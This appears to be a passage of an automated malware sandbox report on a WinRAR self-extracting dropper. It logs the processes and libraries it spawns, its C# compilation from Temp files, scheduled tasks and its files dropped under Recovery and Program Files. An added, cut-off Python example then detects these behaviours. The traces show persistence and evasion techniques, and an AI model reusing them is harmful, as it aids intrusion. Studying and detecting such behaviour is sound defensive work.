                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: version.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: version.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                                    (The same module set is recorded for each of the five powershell.exe instances in this part of the trace; the five lists differ only in load order, and the last one lacks atl.dll. Of note are amsi.dll, meaning AMSI was initialised for the script content, and the CIM/WMI client libraries mi.dll, miutils.dll, wmidcom.dll and wbemcomn.dll, which is what CIM-based cmdlets, the Defender preference cmdlets among them, pull in.)
                                    Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Section loaded: mscoree.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Section loaded: kernel.appcore.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Section loaded: version.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Section loaded: uxtheme.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Section loaded: windows.storage.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Section loaded: wldp.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Section loaded: profapi.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Section loaded: cryptsp.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Section loaded: rsaenh.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Section loaded: cryptbase.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Section loaded: sspicli.dll
                                    (This WinPerfcommon.exe module list is recorded twice in the trace, identically.)
                                    Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
                                    Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
                                    Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
                                    Source: C:\Users\user\Desktop\top.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                                    Source: Window Recorder Window detected: More than 3 window changes detected
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Directory created: C:\Program Files\MSBuild\Microsoft\SystemSettings.exe
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Directory created: C:\Program Files\MSBuild\Microsoft\9e60a5f7a3bd80
                                    Source: top.exe Static file information: File size 2342756 > 1048576
                                    Source: top.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: top.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: top.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: top.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: top.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: top.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: top.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: top.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: top.exe
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\imeik232\imeik232.pdb source: WinPerfcommon.exe, 00000006.00000002.2427021597.000000000343E000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.pdb source: WinPerfcommon.exe, 00000006.00000002.2427021597.000000000343E000.00000004.00000800.00020000.00000000.sdmp
                                    Source: top.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: top.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: top.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: top.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: top.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline"
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imeik232\imeik232.cmdline"
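The two csc.exe invocations above, the parent's location in a made-up top-level directory (C:\msproviderBrokerMonitornet), and the WMI Win32_Process::Create calls listed under Persistence and Installation Behavior below are three process-creation patterns that are cheap to detect from endpoint telemetry. The following is an added example, not code from the Joe Sandbox report or from the sample, showing the three checks applied to constructed Sysmon-style process-creation records modelled on the report's command lines. The directory allow-list, the user-writable path patterns and the event records are assumptions made for the example; the fact that processes started through Win32_Process::Create appear as children of WmiPrvSE.exe is standard Windows behaviour.

```python
r"""Added example (not from the Joe Sandbox report or the sample):
process-creation detection for the three behaviours the report records
for WinPerfcommon.exe:

  1. csc.exe compiling from a response file under the user's
     AppData\Local\Temp (the .cmdline files; the matching .pdb strings in
     WinPerfcommon.exe memory corroborate that the compile ran),
  2. the parent binary living in a non-standard top-level directory
     (C:\msproviderBrokerMonitornet),
  3. process creation through WMI Win32_Process::Create, whose children
     run under WmiPrvSE.exe rather than under the caller.

SAMPLE_EVENTS are constructed records; the allow-lists are assumptions.
"""
import re
from typing import Dict, List

# Assumed: top-level directories in which legitimate binaries normally live.
STANDARD_ROOT_DIRS = {"windows", "program files", "program files (x86)",
                      "users", "programdata"}

# Assumed: path fragments any interactive user can write to.
USER_WRITABLE_PATTERNS = [
    re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\"),
    re.compile(r"^[a-z]:\\users\\public\\"),
    re.compile(r"^[a-z]:\\programdata\\"),
    re.compile(r"\\temp\\"),
]

DOTNET_COMPILERS = {"csc.exe", "vbc.exe"}
WIN_PATH_RE = re.compile(r'[A-Za-z]:\\[^"\s]+')  # drive-letter paths in a command line


def _norm(path: str) -> str:
    return path.strip('"').replace("/", "\\").lower()


def basename(path: str) -> str:
    return _norm(path).rsplit("\\", 1)[-1]


def is_user_writable(path: str) -> bool:
    p = _norm(path)
    return any(rx.search(p) for rx in USER_WRITABLE_PATTERNS)


def in_standard_root(path: str) -> bool:
    """True when the first directory below the drive is a standard one."""
    parts = _norm(path).split("\\")
    return len(parts) > 2 and parts[1] in STANDARD_ROOT_DIRS


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules one event matches (empty if none)."""
    hits: List[str] = []
    if basename(event["image"]) in DOTNET_COMPILERS:
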